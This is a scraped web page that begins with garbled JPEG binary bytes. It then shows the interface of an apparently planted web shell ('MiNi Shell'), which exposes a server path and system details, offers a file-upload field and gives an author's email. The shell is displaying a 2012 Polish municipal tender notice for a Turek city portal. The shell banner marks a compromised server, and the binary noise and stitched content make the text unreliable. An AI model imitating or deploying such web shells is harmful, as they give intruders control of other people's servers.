JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20120323/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20120323/68137-N-2012.html

<p class="kh_header"><b>Turek: PRZYGOTOWANIE KONCEPCJI, WYKONANIE I UTRZYMYWANIE NA SERWERZE PORTALU MIEJSKIEGO DOSTĘPNEGO POD ADRESEM WWW.MIASTOTUREK.PL</b><br>
<b>Numer ogłoszenia: 68137 - 2012; data zamieszczenia: 23.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta Turku , ul. Kaliska 59, 62-700 Turek, woj. wielkopolskie, tel. 063 289 61 00, faks 063 289 61 11.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.miastoturek.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PRZYGOTOWANIE KONCEPCJI, WYKONANIE I UTRZYMYWANIE NA SERWERZE PORTALU MIEJSKIEGO DOSTĘPNEGO POD ADRESEM WWW.MIASTOTUREK.PL.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest opracowanie koncepcji, wykonanie, pozycjonowanie strony internetowej przez okres jednego roku oraz utrzymywanie na serwerze Wykonawcy przez pierwszy rok gwarancyjny portalu internetowego służącego informacji i promocji miasta Turku.
WYMAGANIA TECHNICZNE
Przygotowanie koncepcji nawiązującej do oficjalnego portalu internetowego miasta Berlin (www.berlin.de), w tym projektu graficznego oraz wykonanie i wdrożenie nowego portalu miejskiego dla Gminy Miejskiej Turek - www.miastoturek.pl.

Ogólne cele i założenia:
Głównym celem portalu internetowego miasta ma być dostarczanie informacji trzem grupom użytkowników (podział na grupy jest istotny ze względu na zbudowanie mapy witryny i zaplanowania nawigacji). Wybrane grupy to: mieszkańcy, turyści, biznes i kultura, jako podstrony nawiązujące wyglądem do strony głównej, z możliwością zwiększenia ich ilości. Układ i nawigacja witryny powinna uwzględniać taki podział informacji, aby poszczególne grupy bez problemu dotarły do interesującego je zasobu.
Nowa wersja strony powinna budować nowoczesny wizerunek Turku, tzn. grafika powinna się wpisywać w obecne trendy projektowania stron internetowych.

Realizacja zadania obejmuje następujące etapy:
Przygotowanie koncepcji funkcjonalnej serwisu (graficzna prezentacja nawigacji po serwisie, np. w formie mapy strony). Koncepcja powinna określać jaki jest cel umieszczenia danego elementu w danym miejscu i powinna być zgodna z celami, jakie ma realizować nowa strona.
Projekty graficzne strony głównej oraz podstron, które obejmują prezentację wyglądu: 
1.strony głównej, na której powinny się znaleźć, przynajmniej, następujące elementy: logo-herb, menu główne, aktualności, link do Biuletynu Informacji Publicznej, miejsce-boks do prezentacji logotypów realizowanych programów unijnych oraz miejsce do umieszczenia linków (w formie bannera lub odnośnika) do różnych zasobów zewnętrznych, takich jak np.: strona Domu Kultury, Muzeum, OSiR itp., flagi z wyborem wersji językowej (angielskiej i niemieckiej) z możliwością automatycznych tłumaczeń przez darmowy ogólnodostępny translator google, banner graficzny (statyczny lub w technologii flash) w rozmiarach zbliżonych do 750x200 pikseli umieszczony w górnej część serwisu, wyszukiwarka (z możliwością wyboru zasobu, który przeszukujemy, np., aktualności, treści podstron, itp.), kalendarz (terminy, do których przyporządkowano dane wydarzenie powinny być wyróżnione np. innym kolorem czcionki), pogoda, kamera on-line, wirtualny spacer, newsletter, sonda;
2.podstrony z treścią (jako treść rozumiane są: teksty, pojedyncze zdjęcia, galerie zdjęć, mapy interaktywne Google, pliki do pobrania, listy wypunktowane),
3.podstrony z listą aktualności (pojedyncza aktualność na liście powinna się składać z: tytułu, miniatury zdjęcia (opcjonalnie), tekstu wprowadzającego (zajawki), daty dodania, linku czytaj całość),
4.podstrony z danymi kontaktowymi (powinna ona zawierać formularz kontaktowy, dane teleadresowe, interaktywną mapkę Google),
5.etap programowania, który powinien obejmować:
1)oprogramowanie szaty graficznej z wykorzystaniem technologii CMS (wymagane poprawne wyświetlanie w przeglądarkach: Internet Explorer od wersji 8 i nowszych, Mozilla Firefox od wersji 2.0 i nowszych, Safari od wersji 3.0 i nowszych, Opera od wersji 9.0 i nowszych oraz Google Chrome od wersji 4.1 i nowszych.
2)wdrożenie systemu CMS umożliwiającego przynajmniej:
-edycję treści z wykorzystaniem edytora WYSIWYG,
-dowolnie zarządzać strukturą serwisu (dodawanie nowych pozycji menu, zmiana kolejności istniejących, tworzenie nowych menu z możliwością umieszczania ich w różnych miejscach serwisu, dodawanie podmenu do 3 poziomów zagłębienia,
-wyświetlanie różnych boksów i modułów (takich jak: newsletter, banner graficzny, aplet Facebooka, itp.) w różnych działach i w dowolnych konfiguracjach,
-samodzielne przetłumaczenie strony na dowolną liczbę wersji językowych z możliwością zaprojektowania oddzielnej mapy strony i innych menu dla poszczególnych wersji językowych,
-tworzenie galerii zdjęć poprzez masowe dodawanie zdjęć (mechanizm ma umożliwiać z poziomu panelu administracyjnego wybór dowolnej liczby zdjęć i automatyczne ich wgranie do systemu oraz opublikowanie w formie galerii na wskazanej podstronie), należy przewidzieć możliwość wyświetlenia stworzonej galerii w więcej niż jednym miejscu witryny (np. w aktualności i na innej podstronie),
-zaawansowane zarządzanie newsami (zarządzanie kategoriami i podkategoriami newsów, możliwość umieszczenia newsa w więcej niż jednej kategorii jednocześnie, możliwość ukrycia newsa (wersje robocze), możliwość szybkiej zmiany kolejności newsów w ramach kategorii z wykorzystaniem metody drag and drop, możliwość dodania tzw. tagów, które powinny kojarzyć ze sobą newsy z takim samym tagiem, po kliknięciu w dany tag system powinien wyświetlać listę wszystkich newsów z tym tagiem),
-zarządzanie użytkownikami z możliwością ustawienia osobnych uprawnień dla każdego użytkownika z podziałem na wszystkie moduły (np. powinna istnieć możliwość stworzenia użytkownika, który może logować się tylko w wybranym dziale np. MDK aktualizuje program kina i kalendarz organizowanych przez siebie wydarzeń),
-pełny wgląd w logi panelu CMS dla uprawnionych użytkowników (możliwość sprawdzenia z jakiego konta użytkownika, kiedy (data, godzina), z jakiego adresu IP dokonano zmian w systemie i w ramach jakiego modułu i jaka akcja została wykonana,
-tworzenie tzw. przyjaznych linków, obsługę newslettera, wprowadzenie baneru Głos Turku z możliwością zamieszczania tam plików do pobrania;
-możliwość wstawiania banerów poza stałymi systemowymi;
-tworzenie sond z pytaniami, mających badać opinie użytkowników;
-zmianę adresu e-mail na jaki wysyłane są informacje z poszczególnych formularzy, 
-umieszczanie w treści map interaktywnych Google,
-system powinien być odpowiednio dobrze zabezpieczony i odporny na ataki;
-dodawanie plików do pobrania z możliwością nadania nazwy pliku oraz krótkiego opisu, dodatkowo system powinien rozpoznawać popularne typy plików (takie jak pdf, doc, itp.) i wyświetlać właściwą dla typu ikonę (np., jeśli umieści się plik w formacie pdf to na stronie ukaże się czerwono biała ikona z napisem pdf), należy wprowadzić kategoryzację plików, przy czym użytkownik może samodzielnie tworzyć i modyfikować kategorie,
-dodawanie filmów z serwisów wideo (np. YouTube) oraz interpretacja wgranego pliku audio (np. mp3, 3gp) w postaci playera wyświetlonego w treści podstrony,
-możliwość wyświetlania strony w formacie czarno-białym lub sephia w sytuacji żałoby - sposób wyświetlania sterowany przez użytkownika z poziomu cms;
-mechanizm samodzielnej podmiany szablony np. z okazji świąt;
-optymalizacja serwisu pod kątem osób słabo widzących;
-uruchomienie kosza w panelu CMS w celu odzyskiwania przypadkowo usuniętych danych;
-wersja mobilna serwisu;
6.etap testów, w którym strony wspólnie testują rozwiązania, wykonawca powinien na bieżąco reagować na zgłaszane uwagi, testy odbywają się na serwerze docelowym na specjalnie przygotowanej domenie, przyjmuje się, że prace będą trwać przynajmniej od poniedziałku do piątku od godziny 8 do 16, po zgłoszeniu każdej serii poprawek wykonawca poinformuje zleceniodawcę drogą elektroniczną o czasie jaki potrzebuje na wprowadzenie poprawek, jednak etap testów nie może być dłuższy niż 7 dni roboczych,
7.etap wdrożenia, który obejmuje:
-szkolenie wskazanych pracowników Urzędu Miejskiego w Turku i jednostek organizacyjnych, w zakresie uzależnionym od przydzielonych zadań (np. administrator musi zostać przeszkolony kompleksowo z obsługi wszystkich wymaganych modułów, natomiast pracownik danego wydziału np. tylko w zakresie dodawania i zarządzania newsami w danej kategorii, wykonawca nie może nałożyć limitu godzin szkoleniowych, przy czym zleceniodawca deklaruje, że w ramach prac przewidzianych umową, nie będzie potrzeby przeszkolenia więcej niż 15 pracowników,
-wykonawca musi dostarczyć instrukcje obsługi rozwiązania w formacie elektronicznym lub papierowym, dodatkowym atutem będą prezentacje funkcjonowania panelu CMS w formie multimedialnych prezentacji,
-uzupełnianie strony w treść powinno się odbywać poprzez skopiowanie ich z dotychczas istniejącego portalu (miastoturek.pl), może się też odbyć częściowo podczas szkoleń, teksty dostarczy zleceniodawca, a wykonawca ma za zadania je opublikować we właściwych działach;
8.możliwość zamieszczania bannerów z możliwością zliczania kliknięć w banner, oraz zamieszczania zasobów zewnętrznych w określonych miejscach serwisu (np. poprzez czytnik RSS z witryny zewnętrznej);
9.wymagane są rozwiązania pozwalające na ułatwienie zarządzania serwisem przy zarządzaniu artykułami:
-domyślnie automatyczne wyświetlanie aktualności na stronie głównej w porządku chronologicznym, bez konieczności definiowania kolejności przy każdorazowej zmianie z jednoczesnym uwzględnieniem możliwości ręcznego ustawiania kolejności,
-możliwością przypięcia artykułu z działu aktualności, tzn. jego stałego wyróżnienia na górze listy, bez względu na datę utworzenia,
-możliwość nie wyświetlania określonego artykułu z działu aktualności na stronie głównej, a jedynie na stronie działu, 
-archiwum aktualności - automatycznie tworzenie menu z podziałem archiwalnych aktualności na okresy, np. lata i miesiące;
10.integracja z serwisem społecznościowym Facebook w zakresie:
-możliwości dodawania znaczników Lubię to do wybranych przez administratora podstron serwisu,
-automatycznej publikacji artykułów w formie wpisów na tablicy strony Facebook prowadzonej przez zamawiającego,
-możliwości (za dodatkową zgodą) wysyłania wpisów oraz komentarzy pod artykułami na tablicę użytkownika na Facebook.com.

Wykonawca jest zobowiązany do udzielenia minimum 12 miesięcznej gwarancji na rozwiązania techniczne oraz wykonywania cyklicznych kopii bezpieczeństwa..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.41.30.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu o udzielenie zamówienia publicznego zamawiający nie żąda wniesienia wadium przetargowego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazanie się zaprojektowaniem i wykonaniem w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, przynajmniej trzech aktualnie funkcjonujących portali internetowych dla jednostek samorządu terytorialnego. Wykonawca zobowiązany jest wskazać adres internetowy do strony każdego z wykazanych portali, w celu umożliwienia zamawiającemu sprawdzenia czy portal jest aktywny;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie o spełnianiu warunków udziału w postępowaniu, określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.miastoturek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Turku
Biuro Zamówień Publicznych i Zakupów (pokój nr 110)
ul. Kaliska 59
62-700 Turek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.04.2012 godzina 11:00, miejsce: Urząd Miejski w Turku
Biuro Obsługi Klienta
ul. Kaliska 59
62-700 Turek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com